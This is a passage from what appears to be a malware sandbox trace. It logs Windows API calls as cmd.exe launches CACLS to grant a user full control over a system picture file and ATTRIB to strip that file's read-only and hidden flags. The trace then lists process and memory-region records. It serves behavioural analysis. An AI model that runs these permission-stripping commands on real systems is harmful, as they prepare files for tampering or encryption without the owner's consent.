lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.628] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0191.628] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0191.628] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0191.628] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0191.628] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0191.628] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0191.628] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0191.628] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0191.628] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0191.628] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0191.628] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0191.628] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0191.628] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0191.628] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0191.628] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0191.628] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0191.628] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0191.628] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0191.628] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0191.628] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0191.628] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0191.628] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0191.628] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0191.628] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0191.628] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0191.628] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0191.628] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0191.628] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0191.628] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0191.629] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0191.629] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0191.629] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0191.629] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0191.629] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0191.629] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0191.629] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0191.629] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0191.629] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0191.629] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0191.629] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0191.629] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0191.629] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0191.629] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0191.629] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0191.629] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0191.629] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0191.629] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0191.629] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0191.629] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0191.629] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0191.629] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0191.629] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0191.629] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0191.629] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0191.629] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0191.629] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0191.629] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0191.629] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0191.629] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0191.629] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0191.629] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0191.629] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0191.629] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0191.629] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0191.629] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0191.629] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0191.629] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0191.629] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0191.629] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0191.629] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0191.629] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0191.629] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0191.629] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0191.630] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0191.630] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0191.630] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0191.630] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0191.630] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0191.630] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0191.630] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0191.630] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0191.630] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0191.630] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0191.630] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0191.630] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0191.630] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0191.630] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0191.630] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0191.630] SetErrorMode (uMode=0x0) returned 0x0 [0191.630] SetErrorMode (uMode=0x1) returned 0x0 [0191.630] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x221e98, lpFilePart=0x18f1bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f1bc*="Desktop") returned 0x18 [0191.630] SetErrorMode (uMode=0x0) returned 0x1 [0191.630] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0191.630] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0191.635] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0191.636] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0xffffffff [0191.636] GetLastError () returned 0x2 [0191.636] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0xffffffff [0191.636] GetLastError () returned 0x2 [0191.636] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0x222180 [0191.636] FindClose (in: hFindFile=0x222180 | out: hFindFile=0x222180) returned 1 [0191.637] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0xffffffff [0191.637] GetLastError () returned 0x2 [0191.637] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0x222180 [0191.637] FindClose (in: hFindFile=0x222180 | out: hFindFile=0x222180) returned 1 [0191.637] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0191.637] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0191.637] GetConsoleTitleW (in: lpConsoleTitle=0x18f430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.637] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f2b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f380 | out: lpAttributeList=0x18f2b8, lpSize=0x18f380) returned 1 [0191.637] UpdateProcThreadAttribute (in: lpAttributeList=0x18f2b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f378, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f2b8, lpPreviousValue=0x0) returned 1 [0191.637] GetStartupInfoW (in: lpStartupInfo=0x18f274 | out: lpStartupInfo=0x18f274*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0191.637] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0191.638] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f314*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f360 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x18f360*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa54, dwThreadId=0x9b0)) returned 1 [0191.641] CloseHandle (hObject=0x4c) returned 1 [0191.641] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0191.641] GetEnvironmentStringsW () returned 0x220308* [0191.641] FreeEnvironmentStringsW (penv=0x220308) returned 1 [0191.641] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0191.751] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18f254 | out: lpExitCode=0x18f254*=0x0) returned 1 [0191.751] CloseHandle (hObject=0x50) returned 1 [0191.751] _vsnwprintf (in: _Buffer=0x18f39c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f260 | out: _Buffer="00000000") returned 8 [0191.751] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0191.751] GetEnvironmentStringsW () returned 0x222410* [0191.751] FreeEnvironmentStringsW (penv=0x222410) returned 1 [0191.751] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0191.752] GetEnvironmentStringsW () returned 0x222410* [0191.752] FreeEnvironmentStringsW (penv=0x222410) returned 1 [0191.752] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f2b8 | out: lpAttributeList=0x18f2b8) [0191.752] GetConsoleTitleW (in: lpConsoleTitle=0x18f69c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.752] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0191.752] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0191.752] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0191.752] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0xffffffff [0191.753] GetLastError () returned 0x2 [0191.753] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0xffffffff [0191.753] GetLastError () returned 0x2 [0191.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0x21e4d8 [0191.753] FindClose (in: hFindFile=0x21e4d8 | out: hFindFile=0x21e4d8) returned 1 [0191.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0xffffffff [0191.753] GetLastError () returned 0x2 [0191.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0x21e4d8 [0191.753] FindClose (in: hFindFile=0x21e4d8 | out: hFindFile=0x21e4d8) returned 1 [0191.753] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0191.753] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0191.753] GetConsoleTitleW (in: lpConsoleTitle=0x18f430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.753] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f2b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f380 | out: lpAttributeList=0x18f2b8, lpSize=0x18f380) returned 1 [0191.753] UpdateProcThreadAttribute (in: lpAttributeList=0x18f2b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f378, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f2b8, lpPreviousValue=0x0) returned 1 [0191.753] GetStartupInfoW (in: lpStartupInfo=0x18f274 | out: lpStartupInfo=0x18f274*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0191.754] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0191.754] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f314*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f360 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"", lpProcessInformation=0x18f360*(hProcess=0x4c, hThread=0x50, dwProcessId=0xa74, dwThreadId=0xac0)) returned 1 [0191.756] CloseHandle (hObject=0x50) returned 1 [0191.756] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0191.756] GetEnvironmentStringsW () returned 0x222410* [0191.756] FreeEnvironmentStringsW (penv=0x222410) returned 1 [0191.756] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0191.826] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x18f254 | out: lpExitCode=0x18f254*=0x0) returned 1 [0191.826] CloseHandle (hObject=0x4c) returned 1 [0191.827] _vsnwprintf (in: _Buffer=0x18f39c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f260 | out: _Buffer="00000000") returned 8 [0191.827] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0191.827] GetEnvironmentStringsW () returned 0x222410* [0191.827] FreeEnvironmentStringsW (penv=0x222410) returned 1 [0191.827] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0191.827] GetEnvironmentStringsW () returned 0x222410* [0191.827] FreeEnvironmentStringsW (penv=0x222410) returned 1 [0191.827] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f2b8 | out: lpAttributeList=0x18f2b8) [0191.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.827] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0191.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.827] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0191.827] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.827] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0191.827] SetConsoleInputExeNameW () returned 0x1 [0191.828] GetConsoleOutputCP () returned 0x1b5 [0191.828] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.828] SetThreadUILanguage (LangId=0x0) returned 0x409 [0191.828] exit (_Code=0) Process: id = "430" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0xa54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "429" os_parent_pid = "0x954" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28147 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28148 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28149 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28150 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 28151 start_va = 0x820000 end_va = 0x828fff entry_point = 0x820000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 28152 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28153 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28154 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28155 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28156 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28157 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28158 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28159 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28160 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 28161 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 28162 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28163 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28164 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28165 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28166 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28167 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28168 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 619 os_tid = 0x9b0 Thread: id = 620 os_tid = 0xa94 Process: id = "431" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d80" os_pid = "0xa74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "429" os_parent_pid = "0x954" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28169 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28170 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28171 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28172 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 28173 start_va = 0xfa0000 end_va = 0xfa6fff entry_point = 0xfa0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28174 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28175 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28176 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28177 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 28178 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28179 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28180 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28181 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 28182 start_va = 0x1d0000 end_va = 0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28183 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 28184 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28185 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28186 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28187 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28188 